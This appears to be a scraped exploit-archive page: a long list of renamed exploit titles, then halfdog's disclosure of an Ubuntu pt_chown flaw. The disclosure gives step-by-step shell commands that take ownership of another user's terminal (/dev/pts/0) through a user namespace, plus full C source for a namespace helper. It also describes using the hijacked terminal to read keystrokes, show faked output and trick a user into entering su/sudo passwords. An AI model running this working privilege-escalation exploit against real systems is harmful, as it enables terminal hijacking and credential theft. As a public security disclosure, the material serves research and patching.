6d17bc529d
4 new exploits dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC) dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC) Spider Solitaire - Denial of Service (PoC) Spider Solitaire - Denial of Service (PoC) Baby FTP Server 1.24 - Denial of Service Baby FTP Server 1.24 - Denial of Service (1) Baby FTP server 1.24 - Denial of Service Baby FTP server 1.24 - Denial of Service (2) Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation Evostream Media Server 1.7.1 (x64) - Denial of Service Evostream Media Server 1.7.1 (x64) - Denial of Service Cerberus FTP Server 8.0.10.1 - Denial of Service Cerberus FTP Server 8.0.10.1 - Denial of Service Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow Solaris 10 sysinfo() - Local Kernel Memory Disclosure Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1) Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC) Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC) Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008) Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008) Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2) Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (1) Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2) Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1) Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1) dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1) Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1) Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1) Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (2) EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1) Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2) Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2) Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow (Metasploit) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2) EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2) D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2) D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit) D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1) D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit) Azure Data Expert Ultimate 2.2.16 - Buffer Overflow Azure Data Expert Ultimate 2.2.16 - Buffer Overflow Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) Article Script 1.6.3 - 'rss.php' SQL Injection (1) Article Script 1.6.3 - 'rss.php' SQL Injection DBHcms 1.1.4 - Remote File Inclusion DBHcms 1.1.4 - 'code' Remote File Inclusion LaserNet CMS 1.5 - SQL Injection (2) LaserNet CMS 1.5 - SQL Injection Clever Copy 3.0 - 'postview.php' SQL Injection (1) Clever Copy 3.0 - 'postview.php' SQL Injection phpAuction - 'profile.php' SQL Injection phpAuction - 'profile.php' SQL Injection (1) Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (1) Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (2) Matterdaddy Market 1.1 - Multiple SQL Injections (1) Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections PHPWebGallery 1.3.4 - Blind SQL Injection PHPWebGallery 1.3.4 - Blind SQL Injection (1) PHPWebGallery 1.3.4 - Blind SQL Injection PHPWebGallery 1.3.4 - Blind SQL Injection (2) Zeeways Shaadi Clone 2.0 - Authentication Bypass Zeeways Shaadi Clone 2.0 - Authentication Bypass (1) Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1) DBHcms 1.1.4 - Remote File Inclusion DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion E-book Store - Multiple Vulnerabilities (1) Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1) E-book Store - Multiple Vulnerabilities (2) E-book Store - Multiple Vulnerabilities Classifieds Script - SQL Injection Classifieds Script - 'rate' SQL Injection Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2) DBHcms 1.1.4 - SQL Injection DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection LaserNet CMS 1.5 - SQL Injection (1) Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (2) Article Script 1.6.3 - 'rss.php' SQL Injection (2) Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (1) Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (1) LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (2) Fonality trixbox 2.4.2 - Cross-Site Scripting Fonality trixbox 2.4.2 - Cross-Site Scripting (1) Fonality trixbox 2.4.2 - Cross-Site Scripting (2) Clever Copy 3.0 - 'postview.php' SQL Injection (2) phpAuction - 'profile.php' SQL Injection phpAuction - 'profile.php' SQL Injection (2) Zeeways Shaadi Clone 2.0 - Authentication Bypass Zeeways Shaadi Clone 2.0 - Authentication Bypass (2) DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2) Matterdaddy Market 1.1 - Multiple SQL Injections (2) Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections WordPress Plugin WP Private Messages 1.0.1 - SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1) Huawei Flybox B660 - Cross-Site Request Forgery Huawei Flybox B660 - Cross-Site Request Forgery (1) Huawei Flybox B660 - Cross-Site Request Forgery Huawei Flybox B660 - Cross-Site Request Forgery (2) Classifieds Script - SQL Injection Classifieds Script - 'term' SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (2)
237 lines
No EOL
8.4 KiB
Text
Executable file
237 lines
No EOL
8.4 KiB
Text
Executable file
Source: http://www.halfdog.net/Security/2015/PtChownArbitraryPtsAccessViaUserNamespace/
|
|
|
|
## Introduction
|
|
|
|
Problem description: With Ubuntu Wily and earlier, /usr/lib/pt_chown was used to change ownership of slave pts devices in /dev/pts to the same uid holding the master file descriptor for the slave. This is done using the pt_chown SUID binary, which invokes the ptsname function on the master-fd, thus again performing a TIOCGPTN ioctl to get the slave pts number. Using the result from the ioctl, the pathname of the slave pts is constructed and chown invoked on it, see login/programs/pt_chown.c:
|
|
|
|
pty = ptsname (PTY_FILENO);
|
|
if (pty == NULL)
|
|
...
|
|
/* Get the group ID of the special `tty' group. */
|
|
p = getgrnam (TTY_GROUP);
|
|
gid = p ? p->gr_gid : getgid ();
|
|
|
|
/* Set the owner to the real user ID, and the group to that special
|
|
group ID. */
|
|
if (chown (pty, getuid (), gid) < 0)
|
|
return FAIL_EACCES;
|
|
|
|
/* Set the permission mode to readable and writable by the owner,
|
|
and writable by the group. */
|
|
if ((st.st_mode & ACCESSPERMS) != (S_IRUSR|S_IWUSR|S_IWGRP)
|
|
&& chmod (pty, S_IRUSR|S_IWUSR|S_IWGRP) < 0)
|
|
return FAIL_EACCES;
|
|
|
|
return 0;
|
|
|
|
The logic above is severely flawed, when there can be more than one master/slave pair having the same number and thus same name. But this condition can be easily created by creating an user namespace, mounting devpts with the newinstance option, create master and slave pts pairs until the number overlaps with a target pts outside the namespace on the host, where there is interest to gain ownership and then
|
|
|
|
## Methods
|
|
|
|
Exploitation is trivial: At first use any user namespace demo to create the namespace needed, e.g. UserNamespaceExec.c (http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c) and work with standard shell commands, e.g. to take over /dev/pts/0:
|
|
|
|
test# who am I
|
|
test pts/1 2015-12-27 12:00
|
|
test# ./UserNamespacesExec -- /bin/bash
|
|
Setting uid map in /proc/5783/uid_map
|
|
Setting gid map in /proc/5783/gid_map
|
|
euid: 0, egid: 0
|
|
euid: 0, egid: 0
|
|
root# mkdir mnt
|
|
root# mount -t devpts -o newinstance /dev/pts mnt
|
|
root# cd mnt
|
|
root# chmod 0666 ptmx
|
|
|
|
Use a second shell to continue:
|
|
|
|
test# cd /proc/5783/cwd
|
|
test# ls -al
|
|
total 4
|
|
drwxr-xr-x 2 root root 0 Dec 27 12:48 .
|
|
drwxr-xr-x 7 test users 4096 Dec 27 11:57 ..
|
|
c--------- 1 test users 5, 2 Dec 27 12:48 ptmx
|
|
test# exec 3<>ptmx
|
|
test# ls -al
|
|
total 4
|
|
drwxr-xr-x 2 root root 0 Dec 27 12:48 .
|
|
drwxr-xr-x 7 test users 4096 Dec 27 11:57 ..
|
|
crw------- 1 test users 136, 0 Dec 27 12:53 0
|
|
crw-rw-rw- 1 test users 5, 2 Dec 27 12:48 ptmx
|
|
test# ls -al /dev/pts/0
|
|
crw--w---- 1 root tty 136, 1 Dec 27 2015 /dev/pts/0
|
|
test# /usr/lib/pt_chown
|
|
test# ls -al /dev/pts/0
|
|
crw--w---- 1 test tty 136, 1 Dec 27 12:50 /dev/pts/0
|
|
|
|
On systems where the TIOCSTI-ioctl is not prohibited, the tools from TtyPushbackPrivilegeEscalation (http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/) to directly inject code into a shell using the pts device. This is not the case at least on Ubuntu Wily. But as reading and writing to the pts is allowed, the malicious user can not intercept all keystrokes and display faked output from commands never really executed. Thus he could lure the user into a) change his password or attempt to invoke su/sudo or b) simulate a situation, where user's next step is predictable and risky and then stop reading the pts, thus making user to execute a command in completely unexpected way.
|
|
|
|
|
|
|
|
|
|
--- UserNamespaceExec.c ---
|
|
/** This software is provided by the copyright owner "as is" and any
|
|
* expressed or implied warranties, including, but not limited to,
|
|
* the implied warranties of merchantability and fitness for a particular
|
|
* purpose are disclaimed. In no event shall the copyright owner be
|
|
* liable for any direct, indirect, incidential, special, exemplary or
|
|
* consequential damages, including, but not limited to, procurement
|
|
* of substitute goods or services, loss of use, data or profits or
|
|
* business interruption, however caused and on any theory of liability,
|
|
* whether in contract, strict liability, or tort, including negligence
|
|
* or otherwise, arising in any way out of the use of this software,
|
|
* even if advised of the possibility of such damage.
|
|
*
|
|
* Copyright (c) 2015-2016 halfdog <me (%) halfdog.net>
|
|
* See http://www.halfdog.net/Misc/Utils/ for more information.
|
|
*
|
|
* This tool creates a new namespace, initialize the uid/gid
|
|
* map and execute the program given as argument. This is similar
|
|
* to unshare(1) from newer util-linux packages.
|
|
*
|
|
* gcc -o UserNamespaceExec UserNamespaceExec.c
|
|
*
|
|
* Usage: UserNamespaceExec [options] -- [program] [args]
|
|
*
|
|
* * --NoSetGroups: do not disable group chanages
|
|
* * --NoSetGidMap:
|
|
* * --NoSetUidMap:
|
|
*/
|
|
|
|
|
|
#define _GNU_SOURCE
|
|
#include <errno.h>
|
|
#include <fcntl.h>
|
|
#include <sched.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <sys/wait.h>
|
|
#include <unistd.h>
|
|
|
|
extern char **environ;
|
|
|
|
static int childFunc(void *arg) {
|
|
int parentPid=getppid();
|
|
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
|
|
while((geteuid()!=0)&&(parentPid==getppid())) {
|
|
sleep(1);
|
|
}
|
|
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
|
|
|
|
int result=execve(((char**)arg)[0], (char**)arg, environ);
|
|
fprintf(stderr, "Exec failed\n");
|
|
return(1);
|
|
}
|
|
|
|
|
|
#define STACK_SIZE (1024 * 1024)
|
|
static char child_stack[STACK_SIZE];
|
|
|
|
int main(int argc, char *argv[]) {
|
|
int argPos;
|
|
int noSetGroupsFlag=0;
|
|
int setGidMapFlag=1;
|
|
int setUidMapFlag=1;
|
|
int result;
|
|
|
|
for(argPos=1; argPos<argc; argPos++) {
|
|
char *argName=argv[argPos];
|
|
if(!strcmp(argName, "--")) {
|
|
argPos++;
|
|
break;
|
|
}
|
|
if(strncmp(argName, "--", 2)) {
|
|
break;
|
|
}
|
|
if(!strcmp(argName, "--NoSetGidMap")) {
|
|
setGidMapFlag=0;
|
|
continue;
|
|
}
|
|
if(!strcmp(argName, "--NoSetGroups")) {
|
|
noSetGroupsFlag=1;
|
|
continue;
|
|
}
|
|
if(!strcmp(argName, "--NoSetUidMap")) {
|
|
setUidMapFlag=0;
|
|
continue;
|
|
}
|
|
|
|
fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
|
|
exit(1);
|
|
}
|
|
|
|
|
|
// Create child; child commences execution in childFunc()
|
|
// CLONE_NEWNS: new mount namespace
|
|
// CLONE_NEWPID
|
|
// CLONE_NEWUTS
|
|
pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
|
|
CLONE_NEWUSER|CLONE_NEWIPC|CLONE_NEWNET|CLONE_NEWNS|SIGCHLD, argv+argPos);
|
|
if(pid==-1) {
|
|
fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
|
|
return(1);
|
|
}
|
|
|
|
char idMapFileName[128];
|
|
char idMapData[128];
|
|
|
|
if(!noSetGroupsFlag) {
|
|
sprintf(idMapFileName, "/proc/%d/setgroups", pid);
|
|
int setGroupsFd=open(idMapFileName, O_WRONLY);
|
|
if(setGroupsFd<0) {
|
|
fprintf(stderr, "Failed to open setgroups\n");
|
|
return(1);
|
|
}
|
|
result=write(setGroupsFd, "deny", 4);
|
|
if(result<0) {
|
|
fprintf(stderr, "Failed to disable setgroups\n");
|
|
return(1);
|
|
}
|
|
close(setGroupsFd);
|
|
}
|
|
|
|
if(setUidMapFlag) {
|
|
sprintf(idMapFileName, "/proc/%d/uid_map", pid);
|
|
fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
|
|
int uidMapFd=open(idMapFileName, O_WRONLY);
|
|
if(uidMapFd<0) {
|
|
fprintf(stderr, "Failed to open uid map\n");
|
|
return(1);
|
|
}
|
|
sprintf(idMapData, "0 %d 1\n", getuid());
|
|
result=write(uidMapFd, idMapData, strlen(idMapData));
|
|
if(result<0) {
|
|
fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
|
|
return(1);
|
|
}
|
|
close(uidMapFd);
|
|
}
|
|
|
|
if(setGidMapFlag) {
|
|
sprintf(idMapFileName, "/proc/%d/gid_map", pid);
|
|
fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
|
|
int gidMapFd=open(idMapFileName, O_WRONLY);
|
|
if(gidMapFd<0) {
|
|
fprintf(stderr, "Failed to open gid map\n");
|
|
return(1);
|
|
}
|
|
sprintf(idMapData, "0 %d 1\n", getgid());
|
|
result=write(gidMapFd, idMapData, strlen(idMapData));
|
|
if(result<0) {
|
|
if(noSetGroupsFlag) {
|
|
fprintf(stderr, "Expected failed GID map write due to enabled group set flag: %d (%s)\n", errno, strerror(errno));
|
|
} else {
|
|
fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
|
|
return(1);
|
|
}
|
|
}
|
|
close(gidMapFd);
|
|
}
|
|
|
|
if(waitpid(pid, NULL, 0)==-1) {
|
|
fprintf(stderr, "Wait failed\n");
|
|
return(1);
|
|
}
|
|
return(0);
|
|
}
|
|
--- EOF --- |